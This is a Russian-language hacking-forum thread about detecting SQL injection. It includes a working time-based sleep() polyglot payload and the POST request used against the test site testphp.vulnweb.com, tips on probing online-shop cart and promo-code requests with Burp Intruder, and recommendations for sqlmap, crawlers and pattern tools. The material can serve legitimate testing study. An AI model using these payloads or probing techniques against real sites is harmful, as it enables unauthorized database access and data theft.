• XSS.stack #1 – первый литературный журнал от юзеров форума

SQL Injection-Поиск

  • Вот как выглядит детект, на примере вышеупомянутого testphp.vulnweb.com:
5555.png

  • Задержка на пейлоад 12846 миллисекунд.
  • Тестировался параметр searchFor=12345 в POST запросе:
Код:
POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

searchFor=12345&goButton=go
  • Пейлоад который отработал (есть в списке под MySQL который выше скинул)
Код:
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
Спасибо большое, дружище!! Лучший!!
 
Дополню немного предыдущие ответы. В интрудере бурпа можно еще подменять данные в пост запросах и хедерах.
И если это шоп, кроме самого очевидного (типа авторизации, поиска и урл параметров) можешь попробовать подобавлять товары в корзину или в избранное, применить промокод и тд. Дальше в прокси логе находишь запрос, где это передавалось и суешь в интрудер, ну про него расписали уже.
 
Последнее редактирование:
Дополню немного предыдущие ответы. В интрудере бурпа можно еще подменять данные в пост запросах и хедерах.
И если это шоп, кроме самого очевидного (типа авторизации, поиска и урл параметров) можешь попробовать подобавлять товары в корзину или в избранное, применить промокод и тд. Дальше в прокси логе находишь запрос, где это передавалось и суешь в интрудер, ну про него расписали уже.
B sqlmap намного всё легче делать и для новичков он будет более полезный, потому что нет графического интерфейса, а как правило консольные приложения лучше, просто git clone https://github.com/sqlmapproject/sqlmap и уже с помощью python'a запускаешь скрипт, всё легко, консольные приложения гораздо лучше графических.
Спасибо за внимание.
 
B sqlmap намного всё легче делать и для новичков он будет более полезный, потому что нет графического интерфейса, а как правило консольные приложения лучше, просто git clone https://github.com/sqlmapproject/sqlmap и уже с помощью python'a запускаешь скрипт, всё легко, консольные приложения гораздо лучше графических.
Спасибо за внимание.
Точно) Просто для обнаружения sql injection он не особо подойдет, для раскрутки топ 1! Нужно же сначала определить какие уязвимые урлы писать в мап
 
Точно) Просто для обнаружения sql injection он не особо подойдет, для раскрутки топ 1! Нужно же сначала определить какие уязвимые урлы писать в мап
Ну для поиска sql-injection конечно он не особо подходит, но есть куча скриптов, которые позволяет прочекать директории сайта и найти в нём уязвимые места по типу .index.php?cid=21 или что-то в подобном роде.
 
Ну для поиска sql-injection конечно он не особо подходит, но есть куча скриптов, которые позволяет прочекать директории сайта и найти в нём уязвимые места по типу .index.php?cid=21 или что-то в подобном роде.
Про фаззинг директорий имеешь ввиду? По типу feroxbuster,gobuster,dirbuster, ffuf или wfuzz? Они как правило просто директории показывают, а burp или другой сканер показывает уязвимые места( разумеется тоже показывая директории). Про какие скрипты речь, подскажи пж))))
 
Про фаззинг директорий имеешь ввиду? По типу feroxbuster,gobuster,dirbuster, ffuf или wfuzz? Они как правило просто директории показывают, а burp или другой сканер показывает уязвимые места( разумеется тоже показывая директории). Про какие скрипты речь, подскажи пж))))
Он скорее всего имел ввиду про кравлеры, пример одного из них: https://github.com/projectdiscovery/katana в связке с ним можешь использовать https://github.com/tomnomnom/gf , https://github.com/1ndianl33t/Gf-Patterns (паттерны к нему)
 
Про фаззинг директорий имеешь ввиду? По типу feroxbuster,gobuster,dirbuster, ffuf или wfuzz? Они как правило просто директории показывают, а burp или другой сканер показывает уязвимые места( разумеется тоже показывая директории). Про какие скрипты речь, подскажи пж))))
Ну конкретно скрипты не могу сказать, но насколько я знаю есть такой скрипт, как Sitadel url: https://github.com/shenril/Sitadel , он мне помогал по крайней мере
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх